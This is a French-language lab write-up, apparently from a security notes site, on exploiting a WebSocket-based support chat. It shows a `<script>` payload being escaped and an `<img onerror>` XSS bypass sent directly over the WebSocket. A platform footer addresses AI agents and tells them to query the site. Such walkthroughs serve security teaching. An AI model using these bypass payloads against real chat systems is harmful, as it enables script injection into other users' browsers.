> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/websockets/websocket-message-manipulation.md).

# Manipulation des messages WebSocket

### Manipulation des messages WebSocket pour exploiter des vulnérabilités

Cette boutique en ligne dispose d’un système en temps réel **fonction de chat** implémentée à l'aide de **WebSockets**. / Les messages envoyés par l'utilisateur s'affichent instantanément dans le navigateur d'un **agent du support**. / L'objectif du laboratoire est de **déclencher une `alert()`** fenêtre contextuelle dans le navigateur de l'agent en manipulant un message WebSocket.

Un champ de chat est disponible sur l'application.

<figure><img src="/files/2a25efff71bc6855b27022d01647a8889806dbd5" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/99005d0ef1de727a134c9511f5ca619da3e9648c" alt=""><figcaption></figcaption></figure>

En inspectant le trafic, on constate que les messages sont envoyés via WebSocket comme suit :

```json
{
    "user":"Vous",
    "content":"bonjour"
}
```

**Test de filtrage**

Essayez d'envoyer la charge utile suivante via le chat :

```javascript
<script>alert(0)</script>
```

Résultat observé : / Le contenu est \*\*échappé côté serveur\*\* et interprété comme du texte :

```javascript
&lt;script&gt;alert(0)&lt;/script&gt;
```

<figure><img src="/files/33011ac7ac2f3ea0a9c8463f52091fb363ca5d2d" alt=""><figcaption></figcaption></figure>

Cela indique la présence d'un filtrage de base contre les `<script>` balises.

**Contourner le filtrage**

Un message WebSocket contenant la charge utile suivante est ensuite envoyé manuellement :

```http
<img src=0 onerror=alert(0)>
```

Le message est **transmis directement** via la requête WebSocket, sans passer par les contrôles habituels de l'interface.

<figure><img src="/files/1afd16b21feac0dcd5ec7021145e0774822f212f" alt=""><figcaption></figcaption></figure>

Lorsque l'agent du support reçoit le message, le navigateur interprète l' `onerror` attribut, ce qui déclenche :

* l'exécution de `alert(0)`
* L'apparition d'une **fenêtre contextuelle** dans le navigateur de l'agent

<figure><img src="/files/ee455c8d65140adc660edc167cef0a861bb61c16" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/websockets/websocket-message-manipulation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
